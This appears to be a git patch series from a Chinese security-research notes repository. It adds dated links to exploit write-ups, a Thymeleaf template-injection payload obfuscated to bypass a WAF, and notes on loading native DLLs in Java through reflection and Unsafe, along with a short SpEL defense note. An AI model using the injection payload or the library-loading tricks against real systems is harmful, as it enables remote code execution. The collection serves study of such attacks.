<63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 00:16:13 +0800 Subject: [PATCH 205/332] Create Readme.md --- .../Thymeleaf/Readme.md" | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 "java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" new file mode 100644 index 0000000..1f606b5 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" @@ -0,0 +1,8 @@ +# 绕过文章 + + ++ [记一次实战之若依SSTI注入绕过玄某盾](https://mp.weixin.qq.com/s/7TCZDkfCXlmEhcTb85fw_Q) + +```java +__${T%20(%0aRuntime%09).%0dgetRuntime%0a(%09)%0d.%00exec('calc')}__::.x +``` From 94ac544cfcfe4ff50f04d4e3bdcf9ca03002fde4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 18:45:41 +0800 Subject: [PATCH 206/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dc792f6..2cab2d8 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -207,3 +207,4 @@ + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** ++ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** From bfd1c0166adf388ec31c6f465aacc5452e1aa36b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 18:58:16 +0800 Subject: [PATCH 207/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2cab2d8..7ad6d0f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -208,3 +208,4 @@ + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** ++ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** From 9d5838edce77f1baeadcc64c5367dc501fbcf4e5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 8 Dec 2022 20:06:46 +0800 Subject: [PATCH 208/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7ad6d0f..b72f4c4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -209,3 +209,4 @@ + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** ++ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** From b541642076316d86f83af6f6d42f488f1c764b32 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 8 Dec 2022 20:11:14 +0800 Subject: [PATCH 209/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b72f4c4..0f0f613 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -210,3 +210,4 @@ + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** ++ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** From 85c348b0513fe1f99d7973ed586e888e091229f9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 15:59:18 +0800 Subject: [PATCH 210/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0f0f613..e263195 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -211,3 +211,4 @@ + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** ++ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** From f52b42909225d1b440c6f148ef72292621c2539f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 18:04:45 +0800 Subject: [PATCH 211/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e263195..928f766 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -212,3 +212,4 @@ + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** ++ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* From 7c7bb49024d7f70b43a23688237c1ad0988865e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 21:21:07 +0800 Subject: [PATCH 212/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 928f766..1c3bad2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -213,3 +213,4 @@ + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* ++ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) From 5bf66424673ceb3a8134b54622bb7fe7c813e77c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 14 Dec 2022 00:24:38 +0800 Subject: [PATCH 213/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1c3bad2..2e0bfa2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -214,3 +214,4 @@ + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) ++ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) From a018982d8b362af7684f13d3f5cfe37b94f1adce Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:20:20 +0800 Subject: [PATCH 214/332] Add files via upload --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 +++++++++++++++++++ ...46\344\271\240\351\230\262\345\276\241.md" | 16 ++++ 2 files changed, 91 insertions(+) create mode 100644 "java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" create mode 100644 "spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" new file mode 100644 index 0000000..d797145 --- /dev/null +++ "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" @@ -0,0 +1,75 @@ +# java 加载链接库的方法 + +https://tttang.com/archive/1436/ + +1.System.load + +```java +try { + System.load("D:\\temp\\calc_x64.dll"); +}catch (UnsatisfiedLinkError e){ + e.printStackTrace(); +} +``` + +2.Runtime.getRuntime().load + +```java +Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); +``` + +3.com.sun.glass.utils.NativeLibLoader.loadLibrary + +```java +com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); +``` + +有限制 + +1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 +2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 + +4.反射模拟底层调用 + +- 如果模拟ClassLoader加载就会存在两个方案 + - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 +- 如果模拟NativeLibrary就只存在load方法 + +**ClassLoader#loadLibrary** + +```java +try { + Class clazz = Class.forName("java.lang.ClassLoader"); + Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); + method.setAccessible(true); + method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); +}catch (Exception e){ + e.printStackTrace(); +} +``` + +**NativeLibrary#load** + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); +Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); +con.setAccessible(true); +Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class aClass = Class.forName("sun.misc.Unsafe"); +Constructor declaredConstructor = aClass.getDeclaredConstructor(); +declaredConstructor.setAccessible(true); +Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); +Object obj = unsafe.allocateInstance(a); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + diff --git "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" new file mode 100644 index 0000000..7eda739 --- /dev/null +++ "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" @@ -0,0 +1,16 @@ +# spel防御 + +最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 + +官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) + +![image-20220325230922109](img/image-20220325230922109.png) + +SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: + +- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 +- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 + +http://rui0.cn/archives/1043 \ No newline at end of file From c8eac49bc4b309dec18aef5f395c6417aa453493 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:11 +0800 Subject: [PATCH 215/332] =?UTF-8?q?Delete=20java=E5=8A=A0=E8=BD=BD?= =?UTF-8?q?=E9=93=BE=E6=8E=A5=E5=BA=93=E7=9A=84=E6=96=B9=E6=B3=95.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 ------------------- 1 file changed, 75 deletions(-) delete mode 100644 "java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" diff --git "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" deleted file mode 100644 index d797145..0000000 --- "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" +++ /dev/null @@ -1,75 +0,0 @@ -# java 加载链接库的方法 - -https://tttang.com/archive/1436/ - -1.System.load - -```java -try { - System.load("D:\\temp\\calc_x64.dll"); -}catch (UnsatisfiedLinkError e){ - e.printStackTrace(); -} -``` - -2.Runtime.getRuntime().load - -```java -Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); -``` - -3.com.sun.glass.utils.NativeLibLoader.loadLibrary - -```java -com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); -``` - -有限制 - -1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 -2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 - -4.反射模拟底层调用 - -- 如果模拟ClassLoader加载就会存在两个方案 - - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 -- 如果模拟NativeLibrary就只存在load方法 - -**ClassLoader#loadLibrary** - -```java -try { - Class clazz = Class.forName("java.lang.ClassLoader"); - Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); - method.setAccessible(true); - method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); -}catch (Exception e){ - e.printStackTrace(); -} -``` - -**NativeLibrary#load** - -```java -String file = "D:\\temp\\calc_x64.dll"; -Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); -Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); -con.setAccessible(true); -Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); -Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); -method.setAccessible(true); -method.invoke(obj, file, false); -``` - -```java -String file = "D:\\temp\\calc_x64.dll"; -Class aClass = Class.forName("sun.misc.Unsafe"); -Constructor declaredConstructor = aClass.getDeclaredConstructor(); -declaredConstructor.setAccessible(true); -Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); -Object obj = unsafe.allocateInstance(a); -Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); -method.setAccessible(true); -method.invoke(obj, file, false); -``` - From 26ae3d9a4125b1558d52b3565d7ee059f86ea92f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:28 +0800 Subject: [PATCH 216/332] =?UTF-8?q?Delete=20spel=E5=AD=A6=E4=B9=A0?= =?UTF-8?q?=E9=98=B2=E5=BE=A1.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...5\246\344\271\240\351\230\262\345\276\241.md" | 16 ---------------- 1 file changed, 16 deletions(-) delete mode 100644 "spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" deleted file mode 100644 index 7eda739..0000000 --- "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" +++ /dev/null @@ -1,16 +0,0 @@ -# spel防御 - -最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 - -官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) - -![image-20220325230922109](img/image-20220325230922109.png) - -SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: - -- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 -- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 - -SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 - -http://rui0.cn/archives/1043 \ No newline at end of file From 07b22ad376e71dcefc1f78afed88ee889f3439d2 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:51 +0800 Subject: [PATCH 217/332] Add files via upload --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 +++++++++++++++++++ ...46\344\271\240\351\230\262\345\276\241.md" | 16 ++++ 2 files changed, 91 insertions(+) create mode 100644 "java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" create mode 100644 "java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" new file mode 100644 index 0000000..d797145 --- /dev/null +++ "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" @@ -0,0 +1,75 @@ +# java 加载链接库的方法 + +https://tttang.com/archive/1436/ + +1.System.load + +```java +try { + System.load("D:\\temp\\calc_x64.dll"); +}catch (UnsatisfiedLinkError e){ + e.printStackTrace(); +} +``` + +2.Runtime.getRuntime().load + +```java +Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); +``` + +3.com.sun.glass.utils.NativeLibLoader.loadLibrary + +```java +com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); +``` + +有限制 + +1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 +2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 + +4.反射模拟底层调用 + +- 如果模拟ClassLoader加载就会存在两个方案 + - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 +- 如果模拟NativeLibrary就只存在load方法 + +**ClassLoader#loadLibrary** + +```java +try { + Class clazz = Class.forName("java.lang.ClassLoader"); + Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); + method.setAccessible(true); + method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); +}catch (Exception e){ + e.printStackTrace(); +} +``` + +**NativeLibrary#load** + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); +Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); +con.setAccessible(true); +Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class aClass = Class.forName("sun.misc.Unsafe"); +Constructor declaredConstructor = aClass.getDeclaredConstructor(); +declaredConstructor.setAccessible(true); +Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); +Object obj = unsafe.allocateInstance(a); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + diff --git "a/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" new file mode 100644 index 0000000..7eda739 --- /dev/null +++ "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" @@ -0,0 +1,16 @@ +# spel防御 + +最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 + +官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) + +![image-20220325230922109](img/image-20220325230922109.png) + +SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: + +- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 +- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 + +http://rui0.cn/archives/1043 \ No newline at end of file From d37127e0d84b1817af929b23a80b7025c0a01920 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:22:21 +0800 Subject: [PATCH 218/332] Add files via upload --- .../img/image-20220325230922109.png" | Bin 0 -> 14995 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 "java\346\227\245\345\270\270/img/image-20220325230922109.png" diff --git "a/java\346\227\245\345\270\270/img/image-20220325230922109.png" "b/java\346\227\245\345\270\270/img/image-20220325230922109.png" new file mode 100644 index 0000000000000000000000000000000000000000..c89682dbeb77ed09f40b9e1aba276300df1066bd GIT binary patch literal 14995 zcmdVBXH=8V+btYHKm|k;M5HOGG?Ak8Dk2C{q)8`85fC9#L+=QPfJl>$AiYViAs|(% z2nYm7q=ptkP3WBA_xr!k`{6wAT4$Z-)0+>h+_{Iz+%wm;uf6w7!e6K>QD3@w2?Bvo zD?d}vfM!TZz;dot$j7ufOi8trd|Tl@y9 zsidKOoqaA_fr+1jlYiR2(~(bFIb`hm6)vdN_Ir64yPdSjk^IL7S; zPIbb4dB5e`1s<4RvI*S&f@kY9Tt^IAWmJk!?d*C>c}i`)9gtZqMi2}S5e`_TljFeC zi|qfroO(}}SI%FdJ$vmcQ00dG^P(~nc&c#rvV;V2|J#uChU!0!Xc=3~KK#?D8$z!A zPa_3#fiM3y63W!mL@(juQ1RK`eJG_CBd2wp$C{?-`kvE$4cOw|t8kPQHL9ar=!ub{^;*;u^lt5-Ab z#N)T$zU8`g@6TPk`YElEG~tUTi<56jd{Wup>?fg{LtopvQFR5{GTOW{x6gSIPOE!m zGN!D<8AF<;y*9wz@ygS(FpXzRD|d#ddFm1}O%qn}Zp(G6B@x4vvc|qn1vxDE9 